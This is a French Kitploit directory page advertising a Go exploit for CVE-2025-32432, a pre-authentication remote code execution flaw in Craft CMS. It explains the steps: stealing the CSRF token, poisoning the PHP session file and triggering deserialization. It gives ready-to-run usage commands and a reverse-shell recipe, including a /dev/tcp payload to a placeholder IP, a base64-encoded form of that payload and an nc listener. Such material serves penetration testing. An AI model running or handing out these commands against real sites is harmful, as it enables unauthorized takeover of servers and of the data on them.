Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32432 — Exploit RCE sans authentification pour Craft CMS en Go. Récupère le jeton de session/CSRF, empoisonne la session PHP, déclenche la désérialisation pour l'exécution de commandes ou un shell inverse. | Kitploit
Outils/GitHubGitHub/heltonpojo/cve-2025-32432
Authentification et AutorisationGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

Exploit RCE sans authentification pour Craft CMS en Go. Récupère le jeton de session/CSRF, empoisonne la session PHP, déclenche la désérialisation pour l'exécution de commandes ou un shell inverse.

Voir le dépôt
il y a 21 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32432 — Craft CMS Pre-Auth RCE

Exploit pour l'exécution de code à distance sans authentification sur Craft CMS, écrit en Go.
Inspiré des travaux originaux de c0gnit00.

Comment ça fonctionne

  1. Récupère la session PHP et le jeton CSRF via GET /admin/login
  2. Empoisonne le fichier de session PHP en injectant du code PHP dans la query string
  3. Déclenche la désérialisation via assets/generate-transform pour inclure et exécuter le fichier empoisonné

Utilisation

root@kitploit:~
go run main.go -u <url> -c <comando> 
FlagDescriptionRequis
-uURL cible (ex : http://target.com)Oui
-cCommande à exécuter (ex : id, whoami)Oui

Exemple

root@kitploit:~
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami

Reverse Shell

1. Générez le payload en base64 avec votre IP et votre port :

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. Ouvrez le listener :

root@kitploit:~
nc -lvnp 4444

3. Exécutez l'exploit avec le payload :

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

Remplacez la valeur en base64 par celle générée à l'étape 1 avec votre IP réelle.

Avertissement

Pour une utilisation exclusive dans des environnements autorisés et des tests de sécurité contrôlés.

Télécharger l’outil